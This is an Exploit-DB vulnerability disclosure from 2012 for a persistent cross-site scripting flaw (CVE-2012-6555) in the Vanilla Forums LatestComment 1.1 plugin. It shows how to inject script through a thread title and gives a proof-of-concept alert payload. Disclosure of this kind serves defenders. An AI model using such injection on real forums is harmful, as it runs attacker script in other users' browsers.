Vanilla Forums LatestComment 1.1 Plugin - Persistent Cross-Site Scripting
Author: Henry Hoggard
type: webapps
platform: php
port:
date_added: 2012-05-21
date_updated: 2012-05-21
verified: 1
codes: OSVDB-82040;CVE-2012-6555
tags:
aliases:
screenshot_url: http://www.exploit-db.com/screenshots/idlt19000/screen-shot-2012-05-21-at-123333-pm.png
application_url: http://www.exploit-db.comV5CQTNWIW8TU.zip
# Title: Vanilla LatestComment 1.1 Plugin Persistant XSS Vulnerability
# Date: 18/5/12
# Author: Henry Hoggard
# Author URL: henryhoggard.co.uk
# Author Twitter: @henryhoggard
# Software: Vanilla Version 2.0.18.4 + Latest Comment 1.1
#http://vanillaforums.org/addon/latestcomment-plugin
# http://vanillaforums.org
#############################################################
Create a new thread with your XSS as the thread title, the XSS will appear on the index page of the forum.
XSS:
<script>alert('x')</script>
#############################################################
http://henryhoggard.co.uk